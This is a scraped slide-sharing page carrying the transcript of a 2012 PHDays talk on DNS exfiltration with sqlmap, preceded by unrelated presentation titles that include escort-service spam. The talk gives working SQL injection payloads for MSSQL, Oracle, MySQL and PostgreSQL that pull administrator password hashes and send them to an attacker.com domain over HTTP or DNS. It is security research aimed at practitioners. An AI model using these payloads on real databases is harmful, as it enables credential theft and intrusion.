04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

DNS exfiltration using sqlmap

  • 1. DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
  • 3. What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
  • 4. What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
  • 5. Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
  • 6. Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
  • 7. Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
  • 8. Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
  • 9. DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
  • 10. DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
  • 11. DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
  • 12. DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
  • 13. DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
  • 14. DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
  • 15. DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
  • 16. DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
  • 17. DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
  • 18. DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
  • 19. DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
  • 20. Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
  • 21. Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
  • 22. Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
  • 23. Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
  • 24. Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
  • 25. Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
  • 26. Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26